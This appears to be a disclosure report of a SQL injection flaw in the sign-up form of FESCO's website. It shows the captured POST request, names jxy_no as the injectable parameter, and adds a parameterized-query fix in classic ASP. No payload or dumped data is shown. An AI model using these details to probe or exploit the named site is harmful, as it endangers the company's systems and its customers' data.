Beijing Foreign Company Human Resources Service Co., Ltd. SQL Injection
Founded in 1979, Beijing Foreign Company Human Resources Service Co., Ltd. (hereinafter referred to as FESCO) was the first company in China to provide professional human resources services for foreign representative institutions in China, foreign financial institutions and economic organizations. With a long history of professional human resources services, rich market experience, and complete service qualifications, it is the first choice of multinational corporations for a strategic human resources partner in China, the most competitive enterprise with the highest brand value in China's human resources industry, and one of the top 500 enterprises in China.
As the leader in China's human resources service industry, FESCO serves more than 20 thousand customers from hundreds of countries and regions, as well as more than 130 Chinese and foreign employees working in these institutions. Its customers include many internationally renowned multinational enterprises, three-capital enterprises, state-owned enterprises, and private enterprises, covering communication, electronics, IT, automobile, petrochemical, pharmaceutical, finance, fast moving consumer goods, and other industries.
POST injection:
POST /vip/salon/baoming.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://www.fesco.com.cn/vip/salon/baoming.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 237
Host: www.fesco.com.cn
Pragma: no-cache
Cookie: CNZZDATA1000501355=1887299462-1447460014-http%253A%252F%252Fjob.fesco.com.cn%252F%7C1447460014; ASPSESSIONIDCCTCRTQB=listen; Limit=1447460011

Submit=%cc%e1%bd%bb&jxy_company=Acunetix&jxy_dept=1&jxy_mail=sample%40email.tst&jxy_mobile=987-65-4329&jxy_name=csqctcgn&jxy_no=1&jxy_request=1&jxy_xingzhi=%b9%fa%c6%f3&jxy_yewubu=0
Injection parameter: jxy_no
Database:
Database Table:
Database dump:
Solution:
Filter.
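One way to apply that fix to jxy_no in classic ASP, shown as an added example rather than code from the affected site: the field is checked against a strict digits-only pattern and every form value is bound as an ADO parameter instead of being concatenated into the SQL text. The table and column names (salon_signup, signup_no, signup_name, company), the Application("SalonConnString") key and the assumption that the page performs an INSERT are hypothetical.

```vbscript
<%
Option Explicit

' ADO constants (values as defined in adovbs.inc)
Const adInteger = 3
Const adVarWChar = 202
Const adParamInput = 1
Const adCmdText = 1
Const adExecuteNoRecords = 128

' True only for 1-9 ASCII digits. IsNumeric is not used because it also
' accepts signs, whitespace, hex (&H..) and exponent forms.
Function IsPlainInteger(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsPlainInteger = re.Test(s)
End Function

Dim rawNo
rawNo = Trim(Request.Form("jxy_no") & "")

' Reject anything that is not a plain integer before touching the database.
If Not IsPlainInteger(rawNo) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Dim conn, cmd
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("SalonConnString")   ' hypothetical key holding the connection string

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' Placeholders only: no request value is ever part of the SQL text.
' Table and column names are hypothetical.
cmd.CommandText = "INSERT INTO salon_signup (signup_no, signup_name, company) VALUES (?, ?, ?)"
cmd.Parameters.Append cmd.CreateParameter("@no", adInteger, adParamInput, , CLng(rawNo))
cmd.Parameters.Append cmd.CreateParameter("@name", adVarWChar, adParamInput, 50, Left(Request.Form("jxy_name") & "", 50))
cmd.Parameters.Append cmd.CreateParameter("@company", adVarWChar, adParamInput, 100, Left(Request.Form("jxy_company") & "", 100))
cmd.Execute , , adExecuteNoRecords

conn.Close
Set cmd = Nothing
Set conn = Nothing
%>
```

The same binding applies to the other jxy_* fields; the digit check alone protects only the one parameter it is applied to.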